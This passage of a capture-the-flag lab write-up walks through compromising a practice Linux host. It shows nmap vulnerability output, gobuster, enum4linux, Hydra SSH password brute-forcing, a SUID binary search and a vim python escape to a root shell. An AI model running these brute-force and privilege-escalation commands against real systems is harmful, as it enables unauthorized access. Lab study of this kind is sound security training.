https://vulners.com/githubexploit/DB8D8364-06FB-55E8-934E-C013B00821B5 *EXPLOIT* | 3A26C086-A741-585B-8FA9-F90780E2CA16 9.3 https://vulners.com/githubexploit/3A26C086-A741-585B-8FA9-F90780E2CA16 *EXPLOIT* | 1337DAY-ID-32925 9.3 https://vulners.com/zdt/1337DAY-ID-32925 *EXPLOIT* | TOMCAT:BE665F9148D024F7474C0628515C3A37 7.5 https://vulners.com/tomcat/TOMCAT:BE665F9148D024F7474C0628515C3A37 | MSF:ILITIES/UBUNTU-CVE-2018-8014/ 7.5 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-8014/ *EXPLOIT* | MSF:ILITIES/ORACLE_LINUX-CVE-2020-1938/ 7.5 https://vulners.com/metasploit/MSF:ILITIES/ORACLE_LINUX-CVE-2020-1938/ *EXPLOIT* | MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1938/ 7.5 https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1938/ *EXPLOIT* | MSF:ILITIES/AMAZON_LINUX-CVE-2020-1938/ 7.5 https://vulners.com/metasploit/MSF:ILITIES/AMAZON_LINUX-CVE-2020-1938/ *EXPLOIT* | EDB-ID:49039 7.5 https://vulners.com/exploitdb/EDB-ID:49039 *EXPLOIT* | CVE-2020-1938 7.5 https://vulners.com/cve/CVE-2020-1938 | CVE-2018-8014 7.5 https://vulners.com/cve/CVE-2018-8014 | C3759325-98F9-5F0F-98F5-6EAE787CE3FB 7.5 https://vulners.com/githubexploit/C3759325-98F9-5F0F-98F5-6EAE787CE3FB *EXPLOIT* | 7130E91B-2DF2-565E-ADE8-4C60D45E5A4D 7.5 https://vulners.com/githubexploit/7130E91B-2DF2-565E-ADE8-4C60D45E5A4D *EXPLOIT* | 6E0425A5-AA6D-5FC6-9F8C-415345C30DD5 7.5 https://vulners.com/githubexploit/6E0425A5-AA6D-5FC6-9F8C-415345C30DD5 *EXPLOIT* | 1638D72C-F3EB-52FB-B16F-5F1996A67C0A 7.5 https://vulners.com/githubexploit/1638D72C-F3EB-52FB-B16F-5F1996A67C0A *EXPLOIT* | 140968B5-6F8E-57C6-8A61-831D5FB78836 7.5 https://vulners.com/githubexploit/140968B5-6F8E-57C6-8A61-831D5FB78836 *EXPLOIT* | 0B52DD25-4874-54EB-8213-8FA10B0966A3 7.5 https://vulners.com/githubexploit/0B52DD25-4874-54EB-8213-8FA10B0966A3 *EXPLOIT* | TOMCAT:3535F2AFC77921EE4AD662129D83A68D 5.8 https://vulners.com/tomcat/TOMCAT:3535F2AFC77921EE4AD662129D83A68D | CVE-2021-30640 5.8 https://vulners.com/cve/CVE-2021-30640 | CVE-2020-1935 5.8 https://vulners.com/cve/CVE-2020-1935 | TOMCAT:34D1BB5AAB77A4FA5A232BB1CC1DBE12 5.1 https://vulners.com/tomcat/TOMCAT:34D1BB5AAB77A4FA5A232BB1CC1DBE12 | MSF:ILITIES/ORACLE_LINUX-CVE-2019-17563/ 5.1 https://vulners.com/metasploit/MSF:ILITIES/ORACLE_LINUX-CVE-2019-17563/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-17563/ 5.1 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-17563/ *EXPLOIT* | MSF:ILITIES/AMAZON_LINUX-CVE-2019-17563/ 5.1 https://vulners.com/metasploit/MSF:ILITIES/AMAZON_LINUX-CVE-2019-17563/ *EXPLOIT* | CVE-2019-17563 5.1 https://vulners.com/cve/CVE-2019-17563 | TOMCAT:E0D7CC4566625A34425D5CE3D847746F 5.0 https://vulners.com/tomcat/TOMCAT:E0D7CC4566625A34425D5CE3D847746F | TOMCAT:C878975BAAD7823EE793B63FC6053125 5.0 https://vulners.com/tomcat/TOMCAT:C878975BAAD7823EE793B63FC6053125 | TOMCAT:C3F367059A3E9B8636ED41FF901D93F9 5.0 https://vulners.com/tomcat/TOMCAT:C3F367059A3E9B8636ED41FF901D93F9 | TOMCAT:A0B0592E070D3A4A393867C40FBB81D8 5.0 https://vulners.com/tomcat/TOMCAT:A0B0592E070D3A4A393867C40FBB81D8 | TOMCAT:42FCCA1B939943E71978F85565FFC5D2 5.0 https://vulners.com/tomcat/TOMCAT:42FCCA1B939943E71978F85565FFC5D2 | TOMCAT:3C894B78CB6026265DCB4F6CBB52E528 5.0 https://vulners.com/tomcat/TOMCAT:3C894B78CB6026265DCB4F6CBB52E528 | TOMCAT:324E50A03961FCE2265C4097A2D9383A 5.0 https://vulners.com/tomcat/TOMCAT:324E50A03961FCE2265C4097A2D9383A | TOMCAT:1ACD2AE0B03FBB401CCE27D5C801BE3B 5.0 https://vulners.com/tomcat/TOMCAT:1ACD2AE0B03FBB401CCE27D5C801BE3B | TOMCAT:045D264F03959F4DF2D140C7A3C6A05B 5.0 https://vulners.com/tomcat/TOMCAT:045D264F03959F4DF2D140C7A3C6A05B | TOMCAT:03526B264C3CCDD4C74F8B8FBF02E5E4 5.0 https://vulners.com/tomcat/TOMCAT:03526B264C3CCDD4C74F8B8FBF02E5E4 | SSV:99316 5.0 https://vulners.com/seebug/SSV:99316 *EXPLOIT* | SMNTC-108874 5.0 https://vulners.com/symantec/SMNTC-108874 | MSF:ILITIES/UBUNTU-CVE-2018-8034/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-8034/ *EXPLOIT* | MSF:ILITIES/UBUNTU-CVE-2018-1336/ 5.0 https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1336/ *EXPLOIT* | CVE-2021-42340 5.0 https://vulners.com/cve/CVE-2021-42340 | CVE-2021-33037 5.0 https://vulners.com/cve/CVE-2021-33037 | CVE-2021-25122 5.0 https://vulners.com/cve/CVE-2021-25122 | CVE-2020-17527 5.0 https://vulners.com/cve/CVE-2020-17527 | CVE-2020-13935 5.0 https://vulners.com/cve/CVE-2020-13935 | CVE-2020-13934 5.0 https://vulners.com/cve/CVE-2020-13934 | CVE-2020-11996 5.0 https://vulners.com/cve/CVE-2020-11996 | CVE-2019-10072 5.0 https://vulners.com/cve/CVE-2019-10072 | CVE-2019-0199 5.0 https://vulners.com/cve/CVE-2019-0199 | CVE-2018-8034 5.0 https://vulners.com/cve/CVE-2018-8034 | CVE-2018-1336 5.0 https://vulners.com/cve/CVE-2018-1336 | 18F5237C-DCAC-5831-AED6-F0880A11DFF2 5.0 https://vulners.com/githubexploit/18F5237C-DCAC-5831-AED6-F0880A11DFF2 *EXPLOIT* | TOMCAT:F551C8E09F0122E8322CF8CB981AC710 4.4 https://vulners.com/tomcat/TOMCAT:F551C8E09F0122E8322CF8CB981AC710 | TOMCAT:A01991EC43D0F6A28E9CB4553C6B4670 4.4 https://vulners.com/tomcat/TOMCAT:A01991EC43D0F6A28E9CB4553C6B4670 | MSF:ILITIES/SUSE-CVE-2019-12418/ 4.4 https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-12418/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-12418/ 4.4 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-12418/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-12418/ 4.4 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-12418/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-12418/ 4.4 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-12418/ *EXPLOIT* | F60737C1-A24B-51C1-AE8D-73A65C778FFF 4.4 https://vulners.com/githubexploit/F60737C1-A24B-51C1-AE8D-73A65C778FFF *EXPLOIT* | E95D9A0E-E9DE-5D95-9879-E07C0257318C 4.4 https://vulners.com/githubexploit/E95D9A0E-E9DE-5D95-9879-E07C0257318C *EXPLOIT* | D5CBA0E2-A4B0-52CE-B93B-F433CE8662DA 4.4 https://vulners.com/githubexploit/D5CBA0E2-A4B0-52CE-B93B-F433CE8662DA *EXPLOIT* | CVE-2021-25329 4.4 https://vulners.com/cve/CVE-2021-25329 | CVE-2020-9484 4.4 https://vulners.com/cve/CVE-2020-9484 | CVE-2019-12418 4.4 https://vulners.com/cve/CVE-2019-12418 | C4EDB405-454C-5160-9A99-21A930740C3F 4.4 https://vulners.com/githubexploit/C4EDB405-454C-5160-9A99-21A930740C3F *EXPLOIT* | B0BA17F5-F171-5C97-9F6C-D5F38B5B64F5 4.4 https://vulners.com/githubexploit/B0BA17F5-F171-5C97-9F6C-D5F38B5B64F5 *EXPLOIT* | 743F51FB-8BF4-5425-AEFA-10B2A14C8F3B 4.4 https://vulners.com/githubexploit/743F51FB-8BF4-5425-AEFA-10B2A14C8F3B *EXPLOIT* | 5602A60A-886A-598C-99B3-EE2E820506AD 4.4 https://vulners.com/githubexploit/5602A60A-886A-598C-99B3-EE2E820506AD *EXPLOIT* | 504D019A-423C-50A0-9677-93192F0ECDFC 4.4 https://vulners.com/githubexploit/504D019A-423C-50A0-9677-93192F0ECDFC *EXPLOIT* | 4278B435-D22E-57E8-ABC4-639BAAFA6FC9 4.4 https://vulners.com/githubexploit/4278B435-D22E-57E8-ABC4-639BAAFA6FC9 *EXPLOIT* | 14CD7401-C309-52B2-B4EE-AD54900F0455 4.4 https://vulners.com/githubexploit/14CD7401-C309-52B2-B4EE-AD54900F0455 *EXPLOIT* | TOMCAT:6B8125EDA215F510A527D712FEF3FF0A 4.3 https://vulners.com/tomcat/TOMCAT:6B8125EDA215F510A527D712FEF3FF0A | TOMCAT:1CE79F1FB24CB690F26B87530FB0DBF3 4.3 https://vulners.com/tomcat/TOMCAT:1CE79F1FB24CB690F26B87530FB0DBF3 | SMNTC-105524 4.3 https://vulners.com/symantec/SMNTC-105524 | PACKETSTORM:163457 4.3 https://vulners.com/packetstorm/PACKETSTORM:163457 *EXPLOIT* | PACKETSTORM:163456 4.3 https://vulners.com/packetstorm/PACKETSTORM:163456 *EXPLOIT* | MSF:ILITIES/JRE-VULN-CVE-2019-2684/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/JRE-VULN-CVE-2019-2684/ *EXPLOIT* | MSF:ILITIES/IBM-JAVA-CVE-2019-2684/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/IBM-JAVA-CVE-2019-2684/ *EXPLOIT* | MSF:ILITIES/IBM-AIX-CVE-2019-2684/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/IBM-AIX-CVE-2019-2684/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-0221/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-0221/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-2684/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-2684/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-2684/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-2684/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-0221/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-0221/ *EXPLOIT* | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-2684/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-2684/ *EXPLOIT* | MSF:ILITIES/GENTOO-LINUX-CVE-2019-2684/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/GENTOO-LINUX-CVE-2019-2684/ *EXPLOIT* | MSF:ILITIES/GENTOO-LINUX-CVE-2019-0221/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/GENTOO-LINUX-CVE-2019-0221/ *EXPLOIT* | MSF:ILITIES/DEBIAN-CVE-2019-2684/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-2684/ *EXPLOIT* | MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-2684/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-2684/ *EXPLOIT* | EDB-ID:50119 4.3 https://vulners.com/exploitdb/EDB-ID:50119 *EXPLOIT* | EDB-ID:50118 4.3 https://vulners.com/exploitdb/EDB-ID:50118 *EXPLOIT* | CVE-2021-41079 4.3 https://vulners.com/cve/CVE-2021-41079 | CVE-2021-24122 4.3 https://vulners.com/cve/CVE-2021-24122 | CVE-2019-0221 4.3 https://vulners.com/cve/CVE-2019-0221 | CVE-2018-8037 4.3 https://vulners.com/cve/CVE-2018-8037 | CVE-2018-11784 4.3 https://vulners.com/cve/CVE-2018-11784 | 1337DAY-ID-36546 4.3 https://vulners.com/zdt/1337DAY-ID-36546 *EXPLOIT* | 1337DAY-ID-36545 4.3 https://vulners.com/zdt/1337DAY-ID-36545 *EXPLOIT* | TOMCAT:909935A4BEB7C54CD1FA804D13CDD890 4.0 https://vulners.com/tomcat/TOMCAT:909935A4BEB7C54CD1FA804D13CDD890 | CVE-2020-13943 4.0 https://vulners.com/cve/CVE-2020-13943 | SMNTC-111247 0.0 https://vulners.com/symantec/SMNTC-111247 |_ SMNTC-111245 0.0 https://vulners.com/symantec/SMNTC-111245 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php |_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.92%E=4%D=11/4%OT=22%CT=1%CU=34280%PV=Y%DS=4%DC=T%G=Y%TM=618494C OS:8%P=aarch64-unknown-linux-gnu)SEQ(SP=102%GCD=1%ISR=106%TI=Z%CI=I%II=I%TS OS:=8)OPS(O1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M OS:506ST11NW7%O6=M506ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68 OS:DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A= OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q OS:=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A OS:%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y OS:%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T OS:=40%CD=S) Uptime guess: 0.019 days (since Thu Nov 4 19:52:32 2021) Network Distance: 4 hops TCP Sequence Prediction: Difficulty=258 (Good luck!) IP ID Sequence Generation: All zeros Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: false | smb-vuln-regsvc-dos: | VULNERABLE: | Service regsvc in Microsoft Windows systems vulnerable to denial of service | State: VULNERABLE | The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference | pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes | while working on smb-enum-sessions. |_ TRACEROUTE (using port 587/tcp) HOP RTT ADDRESS 1 30.62 ms 10.13.0.1 2 ... 3 4 172.85 ms 10.10.74.250 Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Nov 4 20:19:52 2021 -- 1 IP address (1 host up) scanned in 1390.99 seconds ``` Available services: - OpenSSH 7.2p2 on port 22 - Apache 2.4.18 on port 80 - Samba 3 or 4 on ports 139/445 - Apache Jserve on port 8009 - Apache Tomcat 9.0.7 on port 8080 The server looks to be running Ubuntu. Going to `http://10.10.74.250:80` revels a generic "maintenance" page, but there's a note to "\[c\]heck our dev note section if you need to know what to work on." Going to `http://10.10.74.250:8080` reveals what looks like the generic first-run Tomcat page. Poking around there doesn't reveal any obvious modifications. ## Flag 1 Let's hit `http://10.10.74.250:80` with [[gobuster]] and see what we find! ```bash gobuster dir \ -u http://10.10.74.250 \ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ``` It looks like there's a "hidden" directory here... ## Flags 2, 3, 4, and 5 This hidden directory contains two files. dev.txt: ``` 2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K 2018-04-22: SMB has been configured. -K 2018-04-21: I got Apache set up. Will put in our content later. -J ``` Okay, so we've got two users, "J" and "K", and an example REST app of some kind (using Apache Struts?) with version 2.5.12. j.txt: ``` For J: I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP. -K ``` Seems like J has a weak password. From a quick check of the [[Hydra]] [[man]] page, it looks like we can feed it a list of usernames with the -L option. I'm going to make a couple assumptions: - Usernames are probably English-language first names. I'm guessing this because the comments in the /development directory are in English, and because this is supposed to be an "easy" CTF. - The password is probably listed in the rockyou.txt dump. Again, both because of the comment, and because this is an "easy" CTF. A couple of quick searches on [DuckDuckGo](https://duckduckgo.com/) landed me on [this list of common usernames](https://github.com/jeanphorn/wordlist/blob/master/usernames.txt); I'm going to filter that down to just the Js and then feed it + rockyou.txt into [[Hydra]]. ```bash hydra -t 4 -L j.txt -P rockyou.txt -vV 10.10.74.250 ssh ``` Except... That's going to take *forever*. The hint suggests looking at Samba to find usernames, which is a good reminder. I *thought* I had some notes about how to do this, but it looks like I don't. But a little bit of search brings me to [Nmap SMB Scripts and SMB Enumeration Step-By-Step Pentesting Guide](https://www.infosecademy.com/nmap-smb-scripts-enumeration/). To [[Nmap]] again! ```bash nmap -vv -oA basic-pentesting-enumerate-smb -sT \ --script smb-enum-users.nse -p445 10.10.74.250 ``` But this doesn't return any results (maybe it's Windows-specific?). A bit more internet searching and I arrive at [Enumerate SMB with Enum4linux & Smbclient](https://null-byte.wonderhowto.com/how-to/enumerate-smb-with-enum4linux-smbclient-0198049/), which suggests using [[enum4linux]]. ```bash enum4linux -U 10.10.74.250 ``` But this errors out on me before outputting any useful information. (It did list a user named krbtgt, but after getting excited and thinking this might be "K" I realized that this looked like it might be related to [[Kerberos]]... And a brief internet search confirmed this.) Trying to use the Metasploit module auxiliary/smb/smb_lookupsid as suggested in [A Little Guide to SMB Enumeration](https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/) just resulted in an error about the server not being "able to handle the encrypted request." Switching back to trying to get [[enum4linux]] to work, I tried calling it *without* the -U flag. This does a full enumeration, and in particular tries to "brute-force" usernames by guessing SIDs. This worked! (I still got the same error, but the enumeration continued...) Let's turn back to [[Hydra]], but now using the usernames we just found. I'm also going to try a shorter wordlist, because rockyou.txt is ridiculously long. ```bash hydra -t 4 -l $USERNAME -P /usr/share/wordlists/nmap.lst \ -vV 10.10.74.250 ssh ``` We've got a match, and we're in! ```bash env -u SSH_AUTH_SOCK -u SSH_AGENT_PID \ ssh [email protected] ``` ## Flag 6 Now that we're in, let's see if we can escalate privileges. The home directory we're in is a little weird... It contains a single file (~/.lesshst), and is owned by root! Home directories are world-readable, so we can see what's in the other user's home. It looks more normal... But also contains a file called pass.bak, which looks like it might be our last flag ("the final password"). Unfortunately, it's not world-readable, and neither are any of the history files in that directory. Does the current user have [[sudo]] privileges? Running `sudo -l` suggests not. Let's see if there are any interesting binaries on the system that the current user both has access to and I could potentially abuse. ```bash find / -type f \ -a $ -perm -u+s -o -perm -g+s $ \ -exec ls -l {} \; 2> /dev/null ``` And... /usr/bin/vim.basic is SUID root?!? [GTFOBins suggests that this can lead to a privilege escalation if ViM is compiled with Python...](https://gtfobins.github.io/gtfobins/vim/) And, indeed, running `vim.basic --version` reveals that this is the case. Adapting the escape from GTFOBins for the present case gives us: ```bash vim.basic -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")' ``` And this indeed gives us root! With this new power, we can enter the second user's home directory and read pass.bak for our final flag. **Elapsed Time:** 3 h 19 min